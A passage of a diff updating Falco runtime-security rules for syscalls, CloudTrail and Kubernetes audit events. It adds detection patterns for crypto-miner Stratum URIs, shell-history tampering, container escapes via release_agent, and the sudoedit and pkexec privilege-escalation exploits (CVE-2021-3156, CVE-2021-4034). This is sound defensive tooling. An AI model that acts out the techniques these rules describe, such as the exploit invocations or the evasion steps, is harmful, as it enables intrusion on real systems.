+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: The CloudTrail logging has been disabled, this could be potentially malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        The CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
   falco_rules.local.yaml: |
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -376,7 +817,7 @@
     # Or override/append to any rule, macro, or list from the Default Rules
   falco_rules.yaml: |
     #
-    # Copyright (C) 2020 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +847,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +881,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1037,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1154,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
@@ -817,6 +1261,9 @@
     - list: shell_config_directories
       items: [/etc/zsh]
 
+    - macro: user_known_shell_config_modifiers
+      condition: (never_true)
+
     - rule: Modify Shell Configuration File
       desc: Detect attempt to modify shell configuration files
       condition: >
@@ -826,6 +1273,7 @@
          fd.directory in (shell_config_directories))
         and not proc.name in (shell_binaries)
         and not exe_running_docker_save
+        and not user_known_shell_config_modifiers
       output: >
         a shell configuration file has been modified (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline pcmdline=%proc.pcmdline file=%fd.name container_id=%container.id image=%container.image.repository)
       priority:
@@ -938,7 +1386,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1597,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1928,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2043,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2181,7 +2633,7 @@
               registry.access.redhat.com/sematext/agent,
               registry.access.redhat.com/sematext/logagent]
 
-    # These container images are allowed to run with --privileged
+    # These container images are allowed to run with --privileged and full set of capabilities
     - list: falco_privileged_images
       items: [
         docker.io/calico/node,
@@ -2199,10 +2651,12 @@
         gke.gcr.io/kube-proxy,
         gke.gcr.io/gke-metadata-server,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         gcr.io/google-containers/prometheus-to-sd,
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2685,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2701,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2280,14 +2721,40 @@
       priority: INFO
       tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
 
+    # These capabilities were used in the past to escape from containers
+    - macro: excessively_capable_container
+      condition: >
+        (thread.cap_permitted contains CAP_SYS_ADMIN
+        or thread.cap_permitted contains CAP_SYS_MODULE
+        or thread.cap_permitted contains CAP_SYS_RAWIO
+        or thread.cap_permitted contains CAP_SYS_PTRACE
+        or thread.cap_permitted contains CAP_SYS_BOOT
+        or thread.cap_permitted contains CAP_SYSLOG
+        or thread.cap_permitted contains CAP_DAC_READ_SEARCH
+        or thread.cap_permitted contains CAP_NET_ADMIN
+        or thread.cap_permitted contains CAP_BPF)
+
+    - rule: Launch Excessively Capable Container
+      desc: Detect container started with a powerful set of capabilities. Exceptions are made for known trusted images.
+      condition: >
+        container_started and container
+        and excessively_capable_container
+        and not falco_privileged_containers
+        and not user_privileged_containers
+      output: Excessively capable container started (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag cap_permitted=%thread.cap_permitted)
+      priority: INFO
+      tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
+
+
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2415,7 +2882,8 @@
         '"sh -c  -t -i"',
         '"sh -c openssl version"',
         '"bash -c id -Gn kafadmin"',
-        '"sh -c /bin/sh -c ''date +%%s''"'
+        '"sh -c /bin/sh -c ''date +%%s''"',
+        '"sh -c /usr/share/lighttpd/create-mime.conf.pl"'
         ]
 
     # This list allows for easy additions to the set of commands allowed
@@ -2574,7 +3042,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3080,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3104,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3140,7 @@
       desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
@@ -2686,7 +3154,7 @@
     # explicitly enumerate the container images that you want to allow
     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3208,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2944,27 +3413,29 @@
         WARNING
       tags: [process, mitre_persistence]
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: modify_shell_history
       condition: >
         (modify and (
-          evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "ash_history" or
+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
-          evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "ash_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
-          evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "ash_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: truncate_shell_history
       condition: >
         (open_write and (
-          fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "ash_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
 
@@ -3003,7 +3474,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3553,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3176,11 +3657,10 @@
       condition: (fd.sport in (miner_ports) and fd.sip.name in (miner_domains))
 
     - macro: net_miner_pool
-      condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
+      condition: (evt.type in (sendto, sendmsg, connect) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
-      append: false
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
 
     # The rule is disabled by default.
     # Note: falco will send DNS request to resolve miner pool domain which may trigger alerts in your environment.
@@ -3188,13 +3668,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
@@ -3330,7 +3810,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3843,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3893,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
       desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). Executing sudo using sudoedit -s or sudoedit -i command with command-line argument that ends with a single backslash character from an unprivileged user it's possible to elevate the user privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
@@ -3431,13 +3911,17 @@
     - macro: mount_info
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
+    - macro: user_known_mount_in_privileged_containers
+      condition: (never_true)
+
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect file system mount happened inside a privileged container which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
         and proc.name=mount
         and not mount_info
+        and not user_known_mount_in_privileged_containers
       output: Mount was executed inside a privileged container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag)
       priority: WARNING
       tags: [container, cis, mitre_lateral_movement]
@@ -3460,12 +3944,64 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should overwrite this macro to specify conditions under which a
+    # Custom condition for use of ingress remote file copy tool in container
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    -  macro: curl_download
+       condition: proc.name = curl and
+                  (proc.cmdline contains " -o " or
+                  proc.cmdline contains " --output " or
+                  proc.cmdline contains " -O " or
+                  proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
+
+    - rule: Detect release_agent File Container Escapes
+      desc: "This rule detect an attempt to exploit a container escape using release_agent file. By running a container with certains capabilities, a privileged user can modify release_agent file and escape from the container"
+      condition:
+        open_write and container and fd.name endswith release_agent and (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and thread.cap_effective contains CAP_SYS_ADMIN
+      output:
+        "Detect an attempt to exploit a container escape using release_agent file (user=%user.name user_loginuid=%user.loginuid filename=%fd.name %container.info image=%container.image.repository:%container.image.tag cap_effective=%thread.cap_effective)"
+      priority: CRITICAL
+      tags: [container, mitre_privilege_escalation, mitre_lateral_movement]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
   k8s_audit_rules.yaml: |
     #
-    # Copyright (C) 2019 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -3480,7 +4016,14 @@
     # See the License for the specific language governing permissions and
     # limitations under the License.
     #
-    - required_engine_version: 2
+
+    - required_engine_version: 12
+
+    - required_plugin_versions:
+      - name: k8saudit
+        version: 0.1.0
+      - name: json
+        version: 0.3.0
 
     # Like always_true/always_false, but works with k8s audit events
     - macro: k8s_audit_always_true
@@ -3517,13 +4060,24 @@
         cluster-autoscaler,
         "system:addon-manager",
         "cloud-controller-manager",
-        "eks:node-manager",
         "system:kube-controller-manager"
         ]
 
+    - list: eks_allowed_k8s_users
+      items: [
+        "eks:node-manager",
+        "eks:certificate-controller",
+        "eks:fargate-scheduler",
+        "eks:k8s-metrics",
+        "eks:authenticator",
+        "eks:cluster-event-watcher",
+        "eks:nodewatcher",
+        "eks:pod-identity-mutating-webhook"
+        ]
+    -
     - rule: Disallowed K8s User
       desc: Detect any k8s operation by users outside of an allowed set of users.
-      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users)
+      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users) and not ka.user.name in (eks_allowed_k8s_users)
       output: K8s Operation performed by user not in allowed list of users (user=%ka.user.name target=%ka.target.name/%ka.target.resource verb=%ka.verb uri=%ka.uri resp=%ka.response.code)
       priority: WARNING
       source: k8s_audit
@@ -3541,6 +4095,9 @@
     - macro: response_successful
       condition: (ka.response.code startswith 2)
 
+    - macro: kget
+      condition: ka.verb=get
+
     - macro: kcreate
       condition: ka.verb=create
 
@@ -3586,6 +4143,12 @@
     - macro: health_endpoint
       condition: ka.uri=/healthz
 
+    - macro: live_endpoint
+      condition: ka.uri=/livez
+
+    - macro: ready_endpoint
+      condition: ka.uri=/readyz
+
     - rule: Create Disallowed Pod
       desc: >
         Detect an attempt to start a pod with a container image outside of a list of allowed images.
@@ -3618,6 +4181,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64
+        k8s.gcr.io/prometheus-to-sd,
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3627,6 +4203,28 @@
       source: k8s_audit
       tags: [k8s]
 
+    - list: falco_hostpid_images
+      items: []
+
+    - rule: Create HostPid Pod
+      desc: Detect an attempt to start a pod using the host pid namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_pid intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostpid_images)
+      output: Pod started using host pid namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
+    - list: falco_hostipc_images
+      items: []
+
+    - rule: Create HostIPC Pod
+      desc: Detect an attempt to start a pod using the host ipc namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_ipc intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostipc_images)
+      output: Pod started using host ipc namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     - macro: user_known_node_port_service
       condition: (k8s_audit_never_true)
 
@@ -3661,7 +4259,7 @@
     - rule: Anonymous Request Allowed
       desc: >
         Detect any request made by the anonymous user that was allowed
-      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint
+      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint and not live_endpoint and not ready_endpoint
       output: Request by anonymous user allowed (user=%ka.user.name verb=%ka.verb uri=%ka.uri reason=%ka.auth.reason))
       priority: WARNING
       source: k8s_audit
@@ -3741,6 +4339,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         k8s.gcr.io/addon-resizer
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
@@ -3768,9 +4367,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4418,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -3910,7 +4531,7 @@
     - rule: K8s Serviceaccount Created
       desc: Detect any attempt to create a service account
       condition: (kactivity and kcreate and serviceaccount and response_successful)
-      output: K8s Serviceaccount Created (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Created (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3918,7 +4539,7 @@
     - rule: K8s Serviceaccount Deleted
       desc: Detect any attempt to delete a service account
       condition: (kactivity and kdelete and serviceaccount and response_successful)
-      output: K8s Serviceaccount Deleted (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Deleted (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3964,13 +4585,37 @@
       tags: [k8s]
 
     - rule: K8s Secret Deleted
